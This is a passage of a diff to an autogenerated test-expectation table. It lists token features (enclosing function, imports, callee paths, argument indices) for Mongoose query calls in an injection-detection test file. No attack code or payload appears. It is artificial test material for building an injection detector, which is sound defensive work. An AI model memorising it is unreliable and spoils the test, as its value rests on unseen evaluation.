autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:6 | Documen ... \\n\\t\\t.and | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:6 | Documen ... \\n\\t\\t.and | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:13 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:5 | Documen ... K\\n\\t\\t.or | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:5 | Documen ... K\\n\\t\\t.or | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:5 | Documen ... K\\n\\t\\t.or | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:5 | Documen ... K\\n\\t\\t.or | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:74:12 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:11 | Documen ... istinct | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:11 | Documen ... istinct | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:11 | Documen ... istinct | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:11 | Documen ... istinct | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | Documen ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | Documen ... query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | Documen ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | Documen ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | exceptional return of Documen ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | exceptional return of Documen ... query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | exceptional return of Documen ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:75:21 | exceptional return of Documen ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:10 | Documen ... comment | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:10 | Documen ... comment | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:10 | Documen ... comment | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:10 | Documen ... comment | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:76:17 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:8 | Documen ... \\t.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:8 | Documen ... \\t.count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:8 | Documen ... \\t.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:8 | Documen ... \\t.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:77:15 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:7 | Documen ... \\t\\t.exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:7 | Documen ... \\t\\t.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:7 | Documen ... \\t\\t.exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:7 | Documen ... \\t\\t.exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | Documen ... .exec() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | Documen ... .exec() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | Documen ... .exec() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | Documen ... .exec() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | exceptional return of Documen ... .exec() | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | exceptional return of Documen ... .exec() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | exceptional return of Documen ... .exec() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:78:9 | exceptional return of Documen ... .exec() | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:14:71:18 | where | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:14:71:18 | where | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:14:71:18 | where | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:14:71:18 | where | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | CalleeFlexibleAccessPath | Document.where | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | calleeImports | mongoose | @@ -2426,6 +12601,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:20:71:24 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:10:72:14 | where | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:10:72:14 | where | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:10:72:14 | where | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:10:72:14 | where | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | CalleeFlexibleAccessPath | Document.where().where | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | calleeImports | mongoose | @@ -2433,6 +12612,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:72:16:72:20 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:4:73:6 | and | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:4:73:6 | and | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:4:73:6 | and | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:4:73:6 | and | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | CalleeFlexibleAccessPath | Document.where().where().and | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | calleeImports | mongoose | @@ -2440,6 +12623,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:73:8:73:12 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:4:74:5 | or | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:4:74:5 | or | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:4:74:5 | or | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:4:74:5 | or | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | CalleeFlexibleAccessPath | Document.where().where().and().or | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | calleeImports | mongoose | @@ -2447,6 +12634,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:74:7:74:11 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:4:75:11 | distinct | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:4:75:11 | distinct | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:4:75:11 | distinct | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:4:75:11 | distinct | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:13:75:13 | X | CalleeFlexibleAccessPath | Document.where().where().and().or().distinct | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:13:75:13 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:13:75:13 | X | calleeImports | mongoose | @@ -2461,6 +12652,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:16:75:20 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:16:75:20 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:75:16:75:20 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:4:76:10 | comment | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:4:76:10 | comment | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:4:76:10 | comment | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:4:76:10 | comment | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | CalleeFlexibleAccessPath | Document.where().where().and().or().distinct().comment | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | calleeImports | mongoose | @@ -2468,6 +12663,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:76:12:76:16 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:4:77:8 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:4:77:8 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:4:77:8 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:4:77:8 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | CalleeFlexibleAccessPath | Document.where().where().and().or().distinct().comment().count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | calleeImports | mongoose | @@ -2475,6 +12674,42 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:77:10:77:14 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:78:4:78:7 | exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:78:4:78:7 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:78:4:78:7 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:78:4:78:7 | exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:9 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:9 | Mongoose | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:9 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:9 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:26 | Mongoos ... nection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:26 | Mongoos ... nection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:26 | Mongoos ... nection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:26 | Mongoos ... nection | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | Mongoos ... tion(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | exceptional return of Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | exceptional return of Mongoos ... tion(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | exceptional return of Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:29 | exceptional return of Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:35 | Mongoos ... ).count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:35 | Mongoos ... ).count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:35 | Mongoos ... ).count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:35 | Mongoos ... ).count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | Mongoos ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | exceptional return of Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | exceptional return of Mongoos ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | exceptional return of Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:2:81:42 | exceptional return of Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:11:81:26 | createConnection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:11:81:26 | createConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:11:81:26 | createConnection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:11:81:26 | createConnection | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | CalleeFlexibleAccessPath | Mongoose.createConnection | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | calleeImports | mongoose | @@ -2483,6 +12718,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:28:81:28 | X | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:31:81:35 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:31:81:35 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:31:81:35 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:31:81:35 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | CalleeFlexibleAccessPath | Mongoose.createConnection().count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | calleeImports | mongoose | @@ -2490,6 +12729,50 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:81:37:81:41 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:9 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:9 | Mongoose | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:9 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:9 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:26 | Mongoos ... nection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:26 | Mongoos ... nection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:26 | Mongoos ... nection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:26 | Mongoos ... nection | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | Mongoos ... tion(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | exceptional return of Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | exceptional return of Mongoos ... tion(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | exceptional return of Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:29 | exceptional return of Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:35 | Mongoos ... ).model | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:35 | Mongoos ... ).model | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:35 | Mongoos ... ).model | enclosingFunctionName | app.post#functionalargument | +| 